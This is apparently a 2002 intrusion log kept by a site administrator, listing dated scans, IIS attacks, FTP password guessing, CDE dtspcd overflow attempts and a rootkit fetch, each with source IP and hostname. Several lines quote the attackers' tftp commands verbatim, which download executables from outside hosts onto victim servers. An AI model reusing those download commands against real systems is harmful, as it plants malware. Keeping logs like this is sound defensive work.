2002/05/26-14:51:08.97 62.83.79.201 (201-SEVI-30.libre.retevision.es) portscan about 100 ports per ip, multiple ips
2002/05/26-15:38:52.47 213.245.250.105 (cha213245250105.chello.fr) scannet for port 21
2002/05/26-16:11:44.65 67.227.10.251 (1Cust251.tnt1.san-fernando.ca.da.uu.net) ping scan of net
2002/05/26-19:47:35.73 61.182.50.241 (CHINANET Hebei province network,CN) scannet for port 111, buff overflow attacks
2002/05/26-22:24:16.30 67.39.21.37 (adsl-67-39-21-37.dsl.dytnoh.ameritech.net) scannet for port 1214
2002/05/27-07:55:08.12 212.209.165.130 (Telyu AB,SE) massive iis scan/attacks
2002/05/27-10:56:33.06 217.36.24.46 (host217-36-24-46.in-addr.btopenworld.com) scannet for port 80
2002/05/27-13:08:14.38 67.208.237.9 (1Cust9.tnt1.athens.oh.da.uu.net) 1. try to ftp to prime as james, asdf, xdong guessing passwords.
2002/05/27-13:08:14.38 67.208.237.9 (1Cust9.tnt1.athens.oh.da.uu.net) 2. finally, log in as xdong, ls /home, ftp results
2002/05/27-16:31:05.57 195.186.224.150 (bw1-224pub150.bluewin.ch) scannet for port 21
2002/05/28-04:05:12.24 68.98.62.83 (ip68-98-62-83.ph.ph.cox.net) attack IIS server w/ tftp.exe+"-i"+68.98.62.83+get+win1.EXE+c:\win1.EXE\
2002/05/28-07:13:35.48 200.5.115.130 (Kidsports - Futurekids,CAPITAL,AR) scannet for port 21
2002/05/28-07:48:45.13 128.255.53.133 (scilitga.lib.uiowa.edu) scannet for port 80
2002/05/28-10:38:05.59 211.21.41.101 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 1433
2002/05/28-10:45:56.82 68.98.62.83 (ip68-98-62-83.ph.ph.cox.net) attack IIS server w/ tftp.exe+"-i"+68.98.62.83+get+win1.EXE+c:\win1.EXE
2002/05/28-15:40:04.59 148.235.37.135 (customer-148-235-37-135.uninet.net.mx) scannet for port 515
2002/05/28-22:31:18.22 218.2.151.117 (CHINANET Jiangsu province network,CN) send data to ports UDP 2000,8002 on dat switch
2002/05/29-00:32:22.54 61.144.32.27 (NANTIAN BUILDING,CN) scannet for port 111
2002/05/29-05:32:21.06 213.77.169.7 (pa7.szczytno.sdi.tpnet.pl) scannet for port 111
2002/05/29-08:00:45.26 217.81.233.159 (Fundacion Euro-Arabe de Altos Estudios,GRANADA,ES) scannet for port 80
2002/05/29-08:10:51.73 217.81.233.159 (pD951E99F.dip.t-dialin.net) pound on IIS servers
2002/05/29-08:15:42.22 64.230.75.219 (HSE-Ottawa-ppp237150.sympatico.ca) scannet for ports 80,8080
2002/05/29-16:54:06.36 211.199.243.78 (chungbuk daewoo car repair,chungbuk,KR) scannet for port 22
2002/05/29-20:23:59.77 199.1.196.41 (RA Jones & Co. Inc.,OH,US) pound on IIS servers
2002/05/29-20:40:55.92 213.194.110.19 (b-NET Iletisim Hizmetleri A.S.,ISTANBUL,TURKEY) 1. attack IIS server w/ command:
2002/05/29-20:40:55.92 213.194.110.19 (b-NET Iletisim Hizmetleri A.S.,ISTANBUL,TURKEY) 2. tftp.exe%20-i%20trc.27south.com%20GET%20svconf32.exe%20d:\jbuilder5\lib\ext\svconf32.exe
2002/05/30-00:39:11.39 199.1.196.41 (RA Jones & Co. Inc.,OH,US) pound on IIS servers
2002/05/30-01:40:03.08 24.31.164.13 (dhcp31164013.columbus.rr.com) probe several servers w/ telnet
2002/05/30-02:55:40.48 213.30.188.2 (COMPLETEL SAS France,FR) pound on IIS servers
2002/05/30-06:45:44.13 61.177.251.125 (CHINANET Jiangsu province network) pound on IIS servers
2002/05/30-08:35:15.04 61.177.251.125 (CHINANET Jiangsu province network) tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/05/30-08:42:04.88 61.177.251.125 (CHINANET Jiangsu province network) pound on IIS servers
2002/05/30-16:16:33.01 62.11.1.166 (ppp-62-11-1-166.dialup.tiscali.it) use anon ftp to get dummy passwd file from ace
2002/05/30-16:51:21.80 62.11.10.149 (ppp-62-11-10-149.dialup.tiscali.it) ftp to ace using decoded user/pass from bad passwd file
2002/05/30-16:51:21.80 62.11.10.149 (ppp-62-11-10-149.dialup.tiscali.it) multiple attempts to logon to boss as root using ftp
2002/05/30-17:54:15.00 200.171.116.188 (200-171-116-188.dsl.telesp.net.br) scannet for port 25
2002/05/30-17:54:20.37 202.65.209.39 (ip-39-209-65-202.rev.dyxnet.com) scannet for port 25
2002/05/30-18:09:18.87 195.232.54.23 (fra-tgn-oyv-vty23.as.wcom.net) scannet for port 21,111, CDE dtspcd exploit attempt
2002/05/30-18:38:36.54 195.232.54.23 (fra-tgn-oyv-vty23.as.wcom.net) 1. break into unix box. ftp to 216.167.48.17 to get root kit.
2002/05/30-19:01:32.72 195.232.54.23 (fra-tgn-oyv-vty23.as.wcom.net) buff overflow attack port 6112
2002/05/30-19:30:59.51 217.117.57.238 (217-117-57-238.teledisnet.be) scannet for port 21, anon ftp attacks
2002/05/30-23:54:56.16 204.17.42.38 (cisc-eth0.zedcor.com) scannet for port 6112
2002/05/30-23:54:56.16 204.94.50.33 (Ultratech Stepper,CA,US) scannet for port 6112, 1524; buff overflow attacks (CDE dtspcd)
2002/05/31-01:21:25.36 217.235.94.105 (pD9EB5E69.dip.t-dialin.net) portscan boss
2002/05/31-01:34:39.53 217.235.87.225 (pD9EB57E1.dip.t-dialin.net) portscan ace 1539 ports
2002/05/31-04:07:24.88 217.117.57.238 (217-117-57-238.teledisnet.be) scannet for port 21, anon ftp attacks
2002/05/31-05:09:15.29 61.177.251.125 (CHINANET Jiangsu province network) pound on IIS servers